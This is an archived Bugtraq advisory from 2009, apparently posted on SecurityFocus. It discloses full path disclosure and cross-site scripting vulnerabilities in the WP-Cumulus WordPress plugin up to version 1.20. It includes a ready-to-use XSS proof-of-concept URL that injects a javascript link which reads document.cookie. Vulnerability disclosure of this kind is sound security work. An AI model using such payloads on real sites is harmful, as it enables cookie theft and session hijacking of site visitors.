Vulnerabilities in WP-Cumulus for WordPress Nov 24 2009 09:55PM
MustLive (mustlive websecurity com ua)
Hello Bugtraq!

I want to warn you about security vulnerabilities in plugin WP-Cumulus for
WordPress.

These are Full path disclosure and Cross-Site Scripting vulnerabilities.

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagclou
d=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-si
ze:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

Vulnerable are WP-Cumulus 1.20 and previous versions.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/3665/).

P.S.

This is one of that 20 plugins for WordPress where I found 135 different
vulnerabilities (during 2006-2009), which I wrote about in my summary of
vulnerabilities in plugins for WordPress (http://websecurity.com.ua/3397/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus